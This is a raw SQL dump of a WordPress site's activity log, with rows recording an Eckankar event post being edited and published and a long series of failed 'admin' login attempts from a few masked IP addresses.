mb-4\">\r\n	<li><span style=\"font-size: 14pt;\">Inner peace and calm</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Divine love</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Expanded awareness</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Spiritual self-discovery and growth</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Healing of the heart</span></li>\r\n</ul>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">We will chant HU for 15 to 20 minutes, have a few minutes of quiet contemplation followed by spiritual conversation with others of like heart.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">This event is sponsored by Eckankar and is free of charge.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Find out more about HU at&nbsp;<a class=\"!text-viridian\" href=\"https://www.eckankar.org/experience/hu-the-sound-of-soul/\" target=\"_blank\" rel=\"nofollow noopener ugc\">What is HU? | HU is the Sound of Soul | ECKANKAR</a>.</span></p>\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/segofdenver/events/297480934/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\r\n**</strong> <em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(243378,41231,'post_prev_post_date','2023-11-21 09:46:20'),(243379,41231,'post_new_post_date','2023-11-21 09:46:41'),(243380,41231,'_message_key','post_updated'),(243381,41231,'_user_id','15'),(243382,41231,'_user_login','john-admin-96'),(243383,41231,'_user_email','nadazipought@zilch.org'),(243384,41231,'_server_remote_addr','184.96.219.x'),(243385,41231,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?action=edit&post=269416'),(243386,41232,'post_id','269416'),(243387,41232,'post_type','mec-events'),(243388,41232,'post_title','Opening Your Heart to Divine Love'),(243389,41232,'post_prev_post_date','2023-11-21 09:46:41'),(243390,41232,'post_new_post_date','2023-11-21 09:46:46'),(243391,41232,'_message_key','post_updated'),(243392,41232,'_user_id','15'),(243393,41232,'_user_login','john-admin-96'),(243394,41232,'_user_email','nadazipought@zilch.org'),(243395,41232,'_server_remote_addr','184.96.219.x'),(243396,41232,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269416&action=edit'),(243397,41233,'post_type','attachment'),(243398,41233,'attachment_id','269417'),(243399,41233,'attachment_title','GoldenHU'),(243400,41233,'attachment_filename','GoldenHU.webp'),(243401,41233,'attachment_mime','image/webp'),(243402,41233,'attachment_filesize','12428'),(243403,41233,'attachment_parent_id','269416'),(243404,41233,'attachment_parent_title','Opening Your Heart to Divine Love'),(243405,41233,'attachment_parent_post_type','mec-events'),(243406,41233,'_message_key','attachment_created'),(243407,41233,'_user_id','15'),(243408,41233,'_user_login','john-admin-96'),(243409,41233,'_user_email','nadazipought@zilch.org'),(243410,41233,'_server_remote_addr','184.96.219.x'),(243411,41233,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269416&action=edit'),(243412,41234,'post_id','269416'),(243413,41234,'post_type','mec-events'),(243414,41234,'post_title','Opening Your Heart to Divine Love'),(243415,41234,'post_prev_post_date','2023-11-21 09:46:46'),(243416,41234,'post_new_post_date','2023-11-21 09:48:20'),(243417,41234,'post_new_thumb_id','269417'),(243418,41234,'post_new_thumb_title','GoldenHU'),(243419,41234,'_message_key','post_updated'),(243420,41234,'_user_id','15'),(243421,41234,'_user_login','john-admin-96'),(243422,41234,'_user_email','nadazipought@zilch.org'),(243423,41234,'_server_remote_addr','184.96.219.x'),(243424,41234,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269416&action=edit'),(243425,41235,'post_id','269416'),(243426,41235,'post_type','mec-events'),(243427,41235,'post_title','Opening Your Heart to Divine Love'),(243428,41235,'post_prev_post_name',''),(243429,41235,'post_new_post_name','opening-your-heart-to-divine-love'),(243430,41235,'post_prev_post_status','draft'),(243431,41235,'post_new_post_status','publish'),(243432,41235,'post_prev_post_date','2023-11-21 09:48:20'),(243433,41235,'post_new_post_date','2023-11-21 09:49:23'),(243434,41235,'post_prev_post_date_gmt','0000-00-00 00:00:00'),(243435,41235,'post_new_post_date_gmt','2023-11-21 16:49:23'),(243436,41235,'_message_key','post_updated'),(243437,41235,'_user_id','15'),(243438,41235,'_user_login','john-admin-96'),(243439,41235,'_user_email','nadazipought@zilch.org'),(243440,41235,'_server_remote_addr','184.96.219.x'),(243441,41235,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269416&action=edit'),(214786,35382,'_message_key','user_unknown_login_failed'),(214787,35382,'_server_remote_addr','20.205.9.x'),(214775,35380,'failed_username','admin'),(214776,35380,'server_http_user_agent','Mozilla/5.0'),(214777,35380,'_message_key','user_unknown_login_failed'),(214778,35380,'_server_remote_addr','23.99.138.x'),(214779,35381,'failed_username','webfitters_shoreline_admin'),(214780,35381,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(214781,35381,'_message_key','user_unknown_login_failed'),(214782,35381,'_xmlrpc_request','true'),(214783,35381,'_server_remote_addr','20.104.170.x'),(214784,35382,'failed_username','admin'),(214785,35382,'server_http_user_agent','Mozilla/5.0'),(214661,35351,'_message_key','user_unknown_login_failed'),(214662,35351,'_server_remote_addr','20.205.9.x'),(214663,35352,'failed_username','admin'),(214664,35352,'server_http_user_agent','Mozilla/5.0'),(214665,35352,'_message_key','user_unknown_login_failed'),(214666,35352,'_server_remote_addr','23.99.138.x'),(214667,35353,'failed_username','admin'),(214668,35353,'server_http_user_agent','Mozilla/5.0'),(214669,35353,'_message_key','user_unknown_login_failed'),(214670,35353,'_server_remote_addr','20.125.102.x'),(214671,35354,'failed_username','admin'),(214672,35354,'server_http_user_agent','Mozilla/5.0'),(214673,35354,'_message_key','user_unknown_login_failed'),(214674,35354,'_server_remote_addr','20.205.9.x'),(214675,35355,'failed_username','admin'),(214676,35355,'server_http_user_agent','Mozilla/5.0'),(214677,35355,'_message_key','user_unknown_login_failed'),(214678,35355,'_server_remote_addr','20.205.9.x'),(214679,35356,'failed_username','admin'),(214680,35356,'server_http_user_agent','Mozilla/5.0'),(214681,35356,'_message_key','user_unknown_login_failed'),(214682,35356,'_server_remote_addr','23.99.138.x'),(214683,35357,'failed_username','admin'),(214684,35357,'server_http_user_agent','Mozilla/5.0'),(214685,35357,'_message_key','user_unknown_login_failed'),(214686,35357,'_server_remote_addr','20.125.102.x'),(214687,35358,'failed_username','admin'),(214688,35358,'server_http_user_agent','Mozilla/5.0'),(214689,35358,'_message_key','user_unknown_login_failed'),(214690,35358,'_server_remote_addr','20.205.9.x'),(214691,35359,'failed_username','admin'),(214692,35359,'server_http_user_agent','Mozilla/5.0'),(214693,35359,'_message_key','user_unknown_login_failed'),(214694,35359,'_server_remote_addr','23.99.138.x'),(214695,35360,'failed_username','admin'),(214696,35360,'server_http_user_agent','Mozilla/5.0'),(214697,35360,'_message_key','user_unknown_login_failed'),(214698,35360,'_server_remote_addr','20.125.102.x'),(214699,35361,'failed_username','admin'),(214700,35361,'server_http_user_agent','Mozilla/5.0'),(214701,35361,'_message_key','user_unknown_login_failed'),(214702,35361,'_server_remote_addr','20.205.9.x'),(214703,35362,'failed_username','admin'),(214704,35362,'server_http_user_agent','Mozilla/5.0'),(214705,35362,'_message_key','user_unknown_login_failed'),(214706,35362,'_server_remote_addr','23.99.138.x'),(214707,35363,'failed_username','admin'),(214708,35363,'server_http_user_agent','Mozilla/5.0'),(214709,35363,'_message_key','user_unknown_login_failed'),(214710,35363,'_server_remote_addr','20.125.102.x'),(214711,35364,'failed_username','admin'),(214712,35364,'server_http_user_agent','Mozilla/5.0'),(214713,35364,'_message_key','user_unknown_login_failed'),(214714,35364,'_server_remote_addr','20.205.9.x'),(214715,35365,'failed_username','admin'),(214716,35365,'server_http_user_agent','Mozilla/5.0'),(214717,35365,'_message_key','user_unknown_login_failed'),(214718,35365,'_server_remote_addr','23.99.138.x'),(214719,35366,'failed_username','admin'),(214720,35366,'server_http_user_agent','Mozilla/5.0'),(214721,35366,'_message_key','user_unknown_login_failed'),(214722,35366,'_server_remote_addr','20.125.102.x'),(214723,35367,'failed_username','admin'),(214724,35367,'server_http_user_agent','Mozilla/5.0'),(214725,35367,'_message_key','user_unknown_login_failed'),(214726,35367,'_server_remote_addr','20.205.9.x'),(214727,35368,'failed_username','admin'),(214728,35368,'server_http_user_agent','Mozilla/5.0'),(214729,35368,'_message_key','user_unknown_login_failed'),(214730,35368,'_server_remote_addr','20.205.9.x'),(214731,35369,'failed_username','admin'),(214732,35369,'server_http_user_agent','Mozilla/5.0'),(214733,35369,'_message_key','user_unknown_login_failed'),(214734,35369,'_server_remote_addr','23.99.138.x'),(214735,35370,'failed_username','admin'),(214736,35370,'server_http_user_agent','Mozilla/5.0'),(214737,35370,'_message_key','user_unknown_login_failed'),(214738,35370,'_server_remote_addr','20.205.9.x'),(214739,35371,'failed_username','admin'),(214740,35371,'server_http_user_agent','Mozilla/5.0'),(214741,35371,'_message_key','user_unknown_login_failed'),(214742,35371,'_server_remote_addr','23.99.138.x'),(214743,35372,'failed_username','admin'),(214744,35372,'server_http_user_agent','Mozilla/5.0'),(214745,35372,'_message_key','user_unknown_login_failed'),(214746,35372,'_server_remote_addr','20.205.9.x'),(214747,35373,'failed_username','admin'),(214748,35373,'server_http_user_agent','Mozilla/5.0'),(214749,35373,'_message_key','user_unknown_login_failed'),(214750,35373,'_server_remote_addr','20.125.102.x'),(214751,35374,'failed_username','admin'),(214752,35374,'server_http_user_agent','Mozilla/5.0'),(214753,35374,'_message_key','user_unknown_login_failed'),(214754,35374,'_server_remote_addr','23.99.138.x'),(214755,35375,'failed_username','admin'),(214756,35375,'server_http_user_agent','Mozilla/5.0'),(214757,35375,'_message_key','user_unknown_login_failed'),(214758,35375,'_server_remote_addr','20.205.9.x'),(214759,35376,'failed_username','admin'),(214760,35376,'server_http_user_agent','Mozilla/5.0'),(214761,35376,'_message_key','user_unknown_login_failed'),(214762,35376,'_server_remote_addr','23.99.138.x'),(214763,35377,'failed_username','admin'),(214764,35377,'server_http_user_agent','Mozilla/5.0'),(214765,35377,'_message_key','user_unknown_login_failed'),(214766,35377,'_server_remote_addr','20.205.9.x'),(214767,35378,'failed_username','admin'),(214768,35378,'server_http_user_agent','Mozilla/5.0'),(214769,35378,'_message_key','user_unknown_login_failed'),(214770,35378,'_server_remote_addr','20.125.102.x'),(214771,35379,'failed_username','admin'),(214772,35379,'server_http_user_agent','Mozilla/5.0'),(214773,35379,'_message_key','user_unknown_login_failed'),(214774,35379,'_server_remote_addr','20.205.9.x'),(214647,35348,'failed_username','admin'),(214648,35348,'server_http_user_agent','Mozilla/5.0'),(214649,35348,'_message_key','user_unknown_login_failed'),(214650,35348,'_server_remote_addr','20.205.9.x'),(214651,35349,'failed_username','admin'),(214652,35349,'server_http_user_agent','Mozilla/5.0'),(214653,35349,'_message_key','user_unknown_login_failed'),(214654,35349,'_server_remote_addr','23.99.138.x'),(214655,35350,'failed_username','admin'),(214656,35350,'server_http_user_agent','Mozilla/5.0'),(214657,35350,'_message_key','user_unknown_login_failed'),(214658,35350,'_server_remote_addr','20.125.102.x'),(214659,35351,'failed_username','admin'),(214660,35351,'server_http_user_agent','Mozilla/5.0'),(214587,35333,'failed_username','admin'),(214588,35333,'server_http_user_agent','Mozilla/5.0'),(214589,35333,'_message_key','user_unknown_login_failed'),(214590,35333,'_server_remote_addr','20.125.102.x'),(214591,35334,'failed_username','admin'),(214592,35334,'server_http_user_agent','Mozilla/5.0'),(214593,35334,'_message_key','user_unknown_login_failed'),(214594,35334,'_server_remote_addr','23.99.138.x'),(214595,35335,'failed_username','admin'),(214596,35335,'server_http_user_agent','Mozilla/5.0'),(214597,35335,'_message_key','user_unknown_login_failed'),(214598,35335,'_server_remote_addr','20.205.9.x'),(214599,35336,'failed_username','admin'),(214600,35336,'server_http_user_agent','Mozilla/5.0'),(214601,35336,'_message_key','user_unknown_login_failed'),(214602,35336,'_server_remote_addr','20.125.102.x'),(214603,35337,'failed_username','admin'),(214604,35337,'server_http_user_agent','Mozilla/5.0'),(214605,35337,'_message_key','user_unknown_login_failed'),(214606,35337,'_server_remote_addr','23.99.138.x'),(214607,35338,'failed_username','admin'),(214608,35338,'server_http_user_agent','Mozilla/5.0'),(214609,35338,'_message_key','user_unknown_login_failed'),(214610,35338,'_server_remote_addr','20.205.9.x'),(214611,35339,'failed_username','admin'),(214612,35339,'server_http_user_agent','Mozilla/5.0'),(214613,35339,'_message_key','user_unknown_login_failed'),(214614,35339,'_server_remote_addr','20.125.102.x'),(214615,35340,'failed_username','admin'),(214616,35340,'server_http_user_agent','Mozilla/5.0'),(214617,35340,'_message_key','user_unknown_login_failed'),(214618,35340,'_server_remote_addr','23.99.138.x'),(214619,35341,'failed_username','admin'),(214620,35341,'server_http_user_agent','Mozilla/5.0'),(214621,35341,'_message_key','user_unknown_login_failed'),(214622,35341,'_server_remote_addr','20.205.9.x'),(214623,35342,'failed_username','admin'),(214624,35342,'server_http_user_agent','Mozilla/5.0'),(214625,35342,'_message_key','user_unknown_login_failed'),(214626,35342,'_server_remote_addr','20.205.9.x'),(214627,35343,'failed_username','admin'),(214628,35343,'server_http_user_agent','Mozilla/5.0'),(214629,35343,'_message_key','user_unknown_login_failed'),(214630,35343,'_server_remote_addr','23.99.138.x'),(214631,35344,'failed_username','admin'),(214632,35344,'server_http_user_agent','Mozilla/5.0'),(214633,35344,'_message_key','user_unknown_login_failed'),(214634,35344,'_server_remote_addr','20.125.102.x'),(214635,35345,'failed_username','admin'),(214636,35345,'server_http_user_agent','Mozilla/5.0'),(214637,35345,'_message_key','user_unknown_login_failed'),(214638,35345,'_server_remote_addr','20.205.9.x'),(214639,35346,'failed_username','admin'),(214640,35346,'server_http_user_agent','Mozilla/5.0'),(214641,35346,'_message_key','user_unknown_login_failed'),(214642,35346,'_server_remote_addr','23.99.138.x'),(214643,35347,'failed_username','admin'),(214644,35347,'server_http_user_agent','Mozilla/5.0'),(214645,35347,'_message_key','user_unknown_login_failed'),(214646,35347,'_server_remote_addr','20.125.102.x'),(214581,35331,'_message_key','user_unknown_login_failed'),(214582,35331,'_server_remote_addr','23.99.138.x'),(214583,35332,'failed_username','admin'),(214584,35332,'server_http_user_agent','Mozilla/5.0'),(214585,35332,'_message_key','user_unknown_login_failed'),(214586,35332,'_server_remote_addr','20.205.9.x'),(214580,35331,'server_http_user_agent','Mozilla/5.0'),(214575,35330,'failed_username','admin'),(214576,35330,'server_http_user_agent','Mozilla/5.0'),(214577,35330,'_message_key','user_unknown_login_failed'),(214578,35330,'_server_remote_addr','20.125.102.x'),(214579,35331,'failed_username','admin'),(214569,35328,'_message_key','user_unknown_login_failed'),(214570,35328,'_server_remote_addr','23.99.138.x'),(214571,35329,'failed_username','admin'),(214572,35329,'server_http_user_agent','Mozilla/5.0'),(214573,35329,'_message_key','user_unknown_login_failed'),(214574,35329,'_server_remote_addr','20.205.9.x'),(214511,35314,'failed_username','admin'),(214512,35314,'server_http_user_agent','Mozilla/5.0'),(214513,35314,'_message_key','user_unknown_login_failed'),(214514,35314,'_server_remote_addr','20.125.102.x'),(214515,35315,'failed_username','admin'),(214516,35315,'server_http_user_agent','Mozilla/5.0'),(214517,35315,'_message_key','user_unknown_login_failed'),(214518,35315,'_server_remote_addr','23.99.138.x'),(214519,35316,'failed_username','admin'),(214520,35316,'server_http_user_agent','Mozilla/5.0'),(214521,35316,'_message_key','user_unknown_login_failed'),(214522,35316,'_server_remote_addr','20.205.9.x'),(214523,35317,'failed_username','admin'),(214524,35317,'server_http_user_agent','Mozilla/5.0'),(214525,35317,'_message_key','user_unknown_login_failed'),(214526,35317,'_server_remote_addr','20.125.102.x'),(214527,35318,'failed_username','admin'),(214528,35318,'server_http_user_agent','Mozilla/5.0'),(214529,35318,'_message_key','user_unknown_login_failed'),(214530,35318,'_server_remote_addr','23.99.138.x'),(214531,35319,'failed_username','admin'),(214532,35319,'server_http_user_agent','Mozilla/5.0'),(214533,35319,'_message_key','user_unknown_login_failed'),(214534,35319,'_server_remote_addr','20.205.9.x'),(214535,35320,'failed_username','admin'),(214536,35320,'server_http_user_agent','Mozilla/5.0'),(214537,35320,'_message_key','user_unknown_login_failed'),(214538,35320,'_server_remote_addr','20.125.102.x'),(214539,35321,'failed_username','admin'),(214540,35321,'server_http_user_agent','Mozilla/5.0'),(214541,35321,'_message_key','user_unknown_login_failed'),(214542,35321,'_server_remote_addr','20.205.9.x'),(214543,35322,'failed_username','admin'),(214544,35322,'server_http_user_agent','Mozilla/5.0'),(214545,35322,'_message_key','user_unknown_login_failed'),(214546,35322,'_server_remote_addr','23.99.138.x'),(214547,35323,'failed_username','admin'),(214548,35323,'server_http_user_agent','Mozilla/5.0'),(214549,35323,'_message_key','user_unknown_login_failed'),(214550,35323,'_server_remote_addr','20.125.102.x'),(214551,35324,'failed_username','admin'),(214552,35324,'server_http_user_agent','Mozilla/5.0'),(214553,35324,'_message_key','user_unknown_login_failed'),(214554,35324,'_server_remote_addr','20.205.9.x'),(214555,35325,'failed_username','admin'),(214556,35325,'server_http_user_agent','Mozilla/5.0'),(214557,35325,'_message_key','user_unknown_login_failed'),(214558,35325,'_server_remote_addr','23.99.138.x'),(214559,35326,'failed_username','admin'),(214560,35326,'server_http_user_agent','Mozilla/5.0'),(214561,35326,'_message_key','user_unknown_login_failed'),(214562,35326,'_server_remote_addr','20.125.102.x'),(214563,35327,'failed_username','admin'),(214564,35327,'server_http_user_agent','Mozilla/5.0'),(214565,35327,'_message_key','user_unknown_login_failed'),(214566,35327,'_server_remote_addr','20.205.9.x'),(214567,35328,'failed_username','admin'),(214568,35328,'server_http_user_agent','Mozilla/5.0'),(214456,35300,'server_http_user_agent','Mozilla/5.0'),(214457,35300,'_message_key','user_unknown_login_failed'),(214458,35300,'_server_remote_addr','20.205.9.x'),(214459,35301,'failed_username','admin'),(214460,35301,'server_http_user_agent','Mozilla/5.0'),(214461,35301,'_message_key','user_unknown_login_failed'),(214462,35301,'_server_remote_addr','20.205.9.x'),(214463,35302,'failed_username','admin'),(214464,35302,'server_http_user_agent','Mozilla/5.0'),(214465,35302,'_message_key','user_unknown_login_failed'),(214466,35302,'_server_remote_addr','20.205.9.x'),(214467,35303,'failed_username','admin'),(214468,35303,'server_http_user_agent','Mozilla/5.0'),(214469,35303,'_message_key','user_unknown_login_failed'),(214470,35303,'_server_remote_addr','20.205.9.x'),(214471,35304,'failed_username','admin'),(214472,35304,'server_http_user_agent','Mozilla/5.0'),(214473,35304,'_message_key','user_unknown_login_failed'),(214474,35304,'_server_remote_addr','20.205.9.x'),(214475,35305,'failed_username','admin'),(214476,35305,'server_http_user_agent','Mozilla/5.0'),(214477,35305,'_message_key','user_unknown_login_failed'),(214478,35305,'_server_remote_addr','20.205.9.x'),(214479,35306,'failed_username','admin'),(214480,35306,'server_http_user_agent','Mozilla/5.0'),(214481,35306,'_message_key','user_unknown_login_failed'),(214482,35306,'_server_remote_addr','20.205.9.x'),(214483,35307,'failed_username','admin'),(214484,35307,'server_http_user_agent','Mozilla/5.0'),(214485,35307,'_message_key','user_unknown_login_failed'),(214486,35307,'_server_remote_addr','20.125.102.x'),(214487,35308,'failed_username','admin'),(214488,35308,'server_http_user_agent','Mozilla/5.0'),(214489,35308,'_message_key','user_unknown_login_failed'),(214490,35308,'_server_remote_addr','20.205.9.x'),(214491,35309,'failed_username','admin'),(214492,35309,'server_http_user_agent','Mozilla/5.0'),(214493,35309,'_message_key','user_unknown_login_failed'),(214494,35309,'_server_remote_addr','20.125.102.x'),(214495,35310,'failed_username','admin'),(214496,35310,'server_http_user_agent','Mozilla/5.0'),(214497,35310,'_message_key','user_unknown_login_failed'),(214498,35310,'_server_remote_addr','20.205.9.x'),(214499,35311,'failed_username','admin'),(214500,35311,'server_http_user_agent','Mozilla/5.0'),(214501,35311,'_message_key','user_unknown_login_failed'),(214502,35311,'_server_remote_addr','20.205.9.x'),(214503,35312,'failed_username','admin'),(214504,35312,'server_http_user_agent','Mozilla/5.0'),(214505,35312,'_message_key','user_unknown_login_failed'),(214506,35312,'_server_remote_addr','20.125.102.x'),(214507,35313,'failed_username','admin'),(214508,35313,'server_http_user_agent','Mozilla/5.0'),(214509,35313,'_message_key','user_unknown_login_failed'),(214510,35313,'_server_remote_addr','20.205.9.x'),(214450,35298,'_server_remote_addr','20.205.9.x'),(214451,35299,'failed_username','admin'),(214452,35299,'server_http_user_agent','Mozilla/5.0'),(214453,35299,'_message_key','user_unknown_login_failed'),(214454,35299,'_server_remote_addr','20.205.9.x'),(214455,35300,'failed_username','admin'),(214443,35297,'failed_username','admin'),(214444,35297,'server_http_user_agent','Mozilla/5.0'),(214445,35297,'_message_key','user_unknown_login_failed'),(214446,35297,'_server_remote_addr','20.205.9.x'),(214447,35298,'failed_username','admin'),(214448,35298,'server_http_user_agent','Mozilla/5.0'),(214449,35298,'_message_key','user_unknown_login_failed'),(214437,35295,'_message_key','user_unknown_login_failed'),(214438,35295,'_server_remote_addr','20.205.9.x'),(214439,35296,'failed_username','admin'),(214440,35296,'server_http_user_agent','Mozilla/5.0'),(214441,35296,'_message_key','user_unknown_login_failed'),(214442,35296,'_server_remote_addr','20.205.9.x'),(214430,35293,'_server_remote_addr','20.205.9.x'),(214431,35294,'failed_username','admin'),(214432,35294,'server_http_user_agent','Mozilla/5.0'),(214433,35294,'_message_key','user_unknown_login_failed'),(214434,35294,'_server_remote_addr','20.205.9.x'),(214435,35295,'failed_username','admin'),(214436,35295,'server_http_user_agent','Mozilla/5.0'),(214423,35292,'failed_username','admin'),(214424,35292,'server_http_user_agent','Mozilla/5.0'),(214425,35292,'_message_key','user_unknown_login_failed'),(214426,35292,'_server_remote_addr','20.205.9.x'),(214427,35293,'failed_username','admin'),(214428,35293,'server_http_user_agent','Mozilla/5.0'),(214429,35293,'_message_key','user_unknown_login_failed'),(214417,35290,'_xmlrpc_request','true'),(214418,35290,'_server_remote_addr','74.249.245.x'),(214419,35291,'failed_username','admin'),(214420,35291,'server_http_user_agent','Mozilla/5.0'),(214421,35291,'_message_key','user_unknown_login_failed'),(214422,35291,'_server_remote_addr','20.205.9.x'),(214414,35290,'failed_username','admin'),(214415,35290,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'),(214416,35290,'_message_key','user_unknown_login_failed'),(214405,35288,'_message_key','user_unknown_login_failed'),(214406,35288,'_xmlrpc_request','true'),(214407,35288,'_server_remote_addr','20.106.90.x'),(214408,35289,'post_id','269120'),(214409,35289,'post_type','nf_sub'),(214410,35289,'post_title',''),(214411,35289,'_message_key','post_updated'),(214412,35289,'_server_remote_addr','75.203.193.x'),(214413,35289,'_server_http_referer','https://eckankar-colorado.org/resa-faq/satsang-class-registrations-2023-2024/?utm_source=BenchmarkEmail&utm_campaign=ETC_October_2023_News&utm_medium=email'),(214357,35277,'_message_key','user_unknown_login_failed'),(214358,35277,'_server_remote_addr','20.205.9.x'),(214359,35278,'failed_username','admin'),(214360,35278,'server_http_user_agent','Mozilla/5.0'),(214361,35278,'_message_key','user_unknown_login_failed'),(214362,35278,'_server_remote_addr','20.205.9.x'),(214363,35279,'failed_username','admin'),(214364,35279,'server_http_user_agent','Mozilla/5.0'),(214365,35279,'_message_key','user_unknown_login_failed'),(214366,35279,'_server_remote_addr','20.205.9.x'),(214367,35280,'failed_username','admin'),(214368,35280,'server_http_user_agent','Mozilla/5.0'),(214369,35280,'_message_key','user_unknown_login_failed'),(214370,35280,'_server_remote_addr','20.205.9.x'),(214371,35281,'failed_username','admin'),(214372,35281,'server_http_user_agent','Mozilla/5.0'),(214373,35281,'_message_key','user_unknown_login_failed'),(214374,35281,'_server_remote_addr','20.205.9.x'),(214375,35282,'failed_username','admin'),(214376,35282,'server_http_user_agent','Mozilla/5.0'),(214377,35282,'_message_key','user_unknown_login_failed'),(214378,35282,'_server_remote_addr','20.205.9.x'),(214379,35283,'failed_username','admin'),(214380,35283,'server_http_user_agent','Mozilla/5.0'),(214381,35283,'_message_key','user_unknown_login_failed'),(214382,35283,'_server_remote_addr','20.205.9.x'),(214383,35284,'failed_username','admin'),(214384,35284,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'),(214385,35284,'_message_key','user_unknown_login_failed'),(214386,35284,'_xmlrpc_request','true'),(214387,35284,'_server_remote_addr','20.92.249.x'),(214388,35285,'plugin_name','Folders Pro'),(214389,35285,'plugin_current_version','2.9.8'),(214390,35285,'plugin_new_version','2.9.9'),(214391,35285,'_message_key','plugin_update_available'),(214392,35285,'_server_remote_addr','173.231.231.x'),(214393,35286,'failed_username','admin'),(214394,35286,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'),(214395,35286,'_message_key','user_unknown_login_failed'),(214396,35286,'_xmlrpc_request','true'),(214397,35286,'_server_remote_addr','20.125.102.x'),(214398,35287,'failed_username','admin'),(214399,35287,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'),(214400,35287,'_message_key','user_unknown_login_failed'),(214401,35287,'_xmlrpc_request','true'),(214402,35287,'_server_remote_addr','20.125.102.x'),(214403,35288,'failed_username','admin'),(214404,35288,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'),(214301,35263,'_message_key','user_unknown_login_failed'),(214302,35263,'_server_remote_addr','20.205.9.x'),(214303,35264,'failed_username','admin'),(214304,35264,'server_http_user_agent','Mozilla/5.0'),(214305,35264,'_message_key','user_unknown_login_failed'),(214306,35264,'_server_remote_addr','20.205.9.x'),(214307,35265,'failed_username','admin'),(214308,35265,'server_http_user_agent','Mozilla/5.0'),(214309,35265,'_message_key','user_unknown_login_failed'),(214310,35265,'_server_remote_addr','20.205.9.x'),(214311,35266,'failed_username','admin'),(214312,35266,'server_http_user_agent','Mozilla/5.0'),(214313,35266,'_message_key','user_unknown_login_failed'),(214314,35266,'_server_remote_addr','20.205.9.x'),(214315,35267,'failed_username','admin'),(214316,35267,'server_http_user_agent','Mozilla/5.0'),(214317,35267,'_message_key','user_unknown_login_failed'),(214318,35267,'_server_remote_addr','20.205.9.x'),(214319,35268,'failed_username','admin'),(214320,35268,'server_http_user_agent','Mozilla/5.0'),(214321,35268,'_message_key','user_unknown_login_failed'),(214322,35268,'_server_remote_addr','20.205.9.x'),(214323,35269,'failed_username','admin'),(214324,35269,'server_http_user_agent','Mozilla/5.0'),(214325,35269,'_message_key','user_unknown_login_failed'),(214326,35269,'_server_remote_addr','20.205.9.x'),(214327,35270,'failed_username','admin'),(214328,35270,'server_http_user_agent','Mozilla/5.0'),(214329,35270,'_message_key','user_unknown_login_failed'),(214330,35270,'_server_remote_addr','20.205.9.x'),(214331,35271,'failed_username','admin'),(214332,35271,'server_http_user_agent','Mozilla/5.0'),(214333,35271,'_message_key','user_unknown_login_failed'),(214334,35271,'_server_remote_addr','20.205.9.x'),(214335,35272,'failed_username','admin'),(214336,35272,'server_http_user_agent','Mozilla/5.0'),(214337,35272,'_message_key','user_unknown_login_failed'),(214338,35272,'_server_remote_addr','20.205.9.x'),(214339,35273,'failed_username','admin'),(214340,35273,'server_http_user_agent','Mozilla/5.0'),(214341,35273,'_message_key','user_unknown_login_failed'),(214342,35273,'_server_remote_addr','20.205.9.x'),(214343,35274,'failed_username','admin'),(214344,35274,'server_http_user_agent','Mozilla/5.0'),(214345,35274,'_message_key','user_unknown_login_failed'),(214346,35274,'_server_remote_addr','20.205.9.x'),(214347,35275,'failed_username','admin'),(214348,35275,'server_http_user_agent','Mozilla/5.0'),(214349,35275,'_message_key','user_unknown_login_failed'),(214350,35275,'_server_remote_addr','20.205.9.x'),(214351,35276,'failed_username','admin'),(214352,35276,'server_http_user_agent','Mozilla/5.0'),(214353,35276,'_message_key','user_unknown_login_failed'),(214354,35276,'_server_remote_addr','20.205.9.x'),(214355,35277,'failed_username','admin'),(214356,35277,'server_http_user_agent','Mozilla/5.0'),(214294,35261,'_server_remote_addr','20.205.9.x'),(214295,35262,'failed_username','admin'),(214296,35262,'server_http_user_agent','Mozilla/5.0'),(214297,35262,'_message_key','user_unknown_login_failed'),(214298,35262,'_server_remote_addr','20.205.9.x'),(214299,35263,'failed_username','admin'),(214300,35263,'server_http_user_agent','Mozilla/5.0'),(214288,35260,'server_http_user_agent','Mozilla/5.0'),(214289,35260,'_message_key','user_unknown_login_failed'),(214290,35260,'_server_remote_addr','20.205.9.x'),(214291,35261,'failed_username','admin'),(214292,35261,'server_http_user_agent','Mozilla/5.0'),(214293,35261,'_message_key','user_unknown_login_failed'),(214285,35259,'_message_key','user_unknown_login_failed'),(214286,35259,'_server_remote_addr','20.205.9.x'),(214287,35260,'failed_username','admin'),(214230,35245,'_server_remote_addr','20.205.9.x'),(214231,35246,'failed_username','admin'),(214232,35246,'server_http_user_agent','Mozilla/5.0'),(214233,35246,'_message_key','user_unknown_login_failed'),(214234,35246,'_server_remote_addr','20.205.9.x'),(214235,35247,'failed_username','admin'),(214236,35